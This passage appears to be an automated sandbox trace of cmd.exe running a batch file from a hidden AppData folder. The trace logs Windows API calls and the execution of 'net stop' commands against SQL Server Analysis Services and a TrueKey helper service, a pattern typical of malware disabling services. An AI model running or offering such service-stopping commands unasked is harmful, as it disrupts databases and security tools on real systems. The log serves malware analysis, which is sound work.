MemoryPointer=0x3f6cf0) returned 0x5c [0040.655] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.655] GetProcessHeap () returned 0x3e0000 [0040.655] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0040.655] GetProcessHeap () returned 0x3e0000 [0040.655] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0040.655] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0040.655] GetProcessHeap () returned 0x3e0000 [0040.655] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0040.655] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.655] GetProcessHeap () returned 0x3e0000 [0040.655] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0040.656] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0040.656] GetProcessHeap () returned 0x3e0000 [0040.656] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0040.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.656] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.656] GetLastError () returned 0x2 [0040.656] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.656] GetLastError () returned 0x2 [0040.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.656] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0040.656] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0040.656] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.657] GetLastError () returned 0x2 [0040.657] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0040.657] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0040.657] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.657] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0040.657] SetErrorMode (uMode=0x0) returned 0x1 [0040.657] GetProcessHeap () returned 0x3e0000 [0040.657] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0040.657] GetProcessHeap () returned 0x3e0000 [0040.657] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0040.657] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.657] GetProcessHeap () returned 0x3e0000 [0040.657] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0040.657] GetProcessHeap () returned 0x3e0000 [0040.657] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0040.657] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0040.657] GetProcessHeap () returned 0x3e0000 [0040.657] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0040.657] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.657] GetProcessHeap () returned 0x3e0000 [0040.658] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0040.658] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0040.658] GetProcessHeap () returned 0x3e0000 [0040.658] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0040.658] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.658] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.658] GetLastError () returned 0x2 [0040.658] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.658] GetLastError () returned 0x2 [0040.658] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.658] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0040.658] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0040.658] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.658] GetLastError () returned 0x2 [0040.658] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0040.659] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0040.659] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.659] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0040.659] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0040.659] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0040.659] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0040.659] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSOLAP$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSOLAP$SQL_2008 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSOLAP$SQL_2008 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x324, dwThreadId=0x7b8)) returned 1 [0040.663] CloseHandle (hObject=0x74) returned 1 [0040.663] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0040.663] GetProcessHeap () returned 0x3e0000 [0040.663] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.663] GetEnvironmentStringsW () returned 0x3f8408* [0040.663] GetProcessHeap () returned 0x3e0000 [0040.663] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.663] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.663] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0040.839] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0040.844] CloseHandle (hObject=0x78) returned 1 [0040.844] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0040.844] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0040.844] GetProcessHeap () returned 0x3e0000 [0040.855] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.856] GetEnvironmentStringsW () returned 0x3f8408* [0040.856] GetProcessHeap () returned 0x3e0000 [0040.856] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.856] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.856] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0040.856] GetProcessHeap () returned 0x3e0000 [0040.856] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.856] GetEnvironmentStringsW () returned 0x3f8408* [0040.856] GetProcessHeap () returned 0x3e0000 [0040.856] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.856] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.856] GetProcessHeap () returned 0x3e0000 [0040.856] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0040.856] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0040.856] _get_osfhandle (_FileHandle=1) returned 0x264 [0040.856] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0040.856] _get_osfhandle (_FileHandle=1) returned 0x264 [0040.856] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0040.856] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0040.856] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0040.857] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0040.857] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0040.857] SetConsoleInputExeNameW () returned 0x1 [0040.857] GetConsoleOutputCP () returned 0x1b5 [0040.857] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0040.857] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0040.858] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0040.858] _get_osfhandle (_FileHandle=3) returned 0x78 [0040.858] SetFilePointer (in: hFile=0x78, lDistanceToMove=1527, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f7 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0040.858] GetProcessHeap () returned 0x3e0000 [0040.858] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0040.858] _get_osfhandle (_FileHandle=3) returned 0x78 [0040.858] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f7 [0040.859] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x12ca, lpOverlapped=0x0) returned 1 [0040.859] SetFilePointer (in: hFile=0x78, lDistanceToMove=1561, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x619 [0040.859] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=34, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop TrueKeyServiceHelper /y\r\nryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 34 [0040.859] _get_osfhandle (_FileHandle=3) returned 0x78 [0040.859] GetFileType (hFile=0x78) returned 0x1 [0040.859] _get_osfhandle (_FileHandle=3) returned 0x78 [0040.859] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x619 [0040.859] GetProcessHeap () returned 0x3e0000 [0040.859] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0040.859] GetProcessHeap () returned 0x3e0000 [0040.859] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0040.860] _tell (_FileHandle=3) returned 1561 [0040.860] _close (_FileHandle=3) returned 0 [0040.860] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0040.860] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0040.860] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0040.860] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0040.860] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0040.860] _wcsicmp (_String1="net", _String2="CD") returned 11 [0040.860] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0040.860] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0040.860] _wcsicmp (_String1="net", _String2="REN") returned -4 [0040.860] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0040.860] _wcsicmp (_String1="net", _String2="SET") returned -5 [0040.860] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0040.860] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0040.860] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0040.860] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0040.860] _wcsicmp (_String1="net", _String2="MD") returned 1 [0040.860] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0040.860] _wcsicmp (_String1="net", _String2="RD") returned -4 [0040.860] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0040.860] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0040.860] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0040.861] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0040.861] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0040.861] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0040.861] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0040.861] _wcsicmp (_String1="net", _String2="VER") returned -8 [0040.861] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0040.861] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0040.861] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0040.861] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0040.861] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0040.861] _wcsicmp (_String1="net", _String2="START") returned -5 [0040.861] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0040.861] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0040.861] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0040.861] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0040.861] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0040.861] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0040.861] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0040.861] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0040.861] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0040.861] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0040.861] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0040.861] SetErrorMode (uMode=0x0) returned 0x1 [0040.861] GetProcessHeap () returned 0x3e0000 [0040.861] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0040.861] GetProcessHeap () returned 0x3e0000 [0040.861] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0040.861] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.861] GetProcessHeap () returned 0x3e0000 [0040.861] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0040.861] GetProcessHeap () returned 0x3e0000 [0040.861] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0040.862] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0040.862] GetProcessHeap () returned 0x3e0000 [0040.862] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0040.862] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.862] GetProcessHeap () returned 0x3e0000 [0040.862] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0040.862] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0040.862] GetProcessHeap () returned 0x3e0000 [0040.862] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0040.862] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.862] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.862] GetLastError () returned 0x2 [0040.862] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.862] GetLastError () returned 0x2 [0040.862] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.862] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0040.862] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0040.862] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.863] GetLastError () returned 0x2 [0040.863] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0040.863] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0040.863] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.863] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0040.863] SetErrorMode (uMode=0x0) returned 0x1 [0040.863] GetProcessHeap () returned 0x3e0000 [0040.863] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0040.863] GetProcessHeap () returned 0x3e0000 [0040.863] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0040.863] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.863] GetProcessHeap () returned 0x3e0000 [0040.863] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0040.863] GetProcessHeap () returned 0x3e0000 [0040.863] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0040.863] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0040.863] GetProcessHeap () returned 0x3e0000 [0040.863] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0040.863] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.863] GetProcessHeap () returned 0x3e0000 [0040.863] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0040.863] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0040.864] GetProcessHeap () returned 0x3e0000 [0040.864] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0040.864] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.864] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.864] GetLastError () returned 0x2 [0040.864] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.864] GetLastError () returned 0x2 [0040.864] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.864] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0040.864] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0040.864] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.864] GetLastError () returned 0x2 [0040.864] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0040.864] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0040.865] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.865] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, 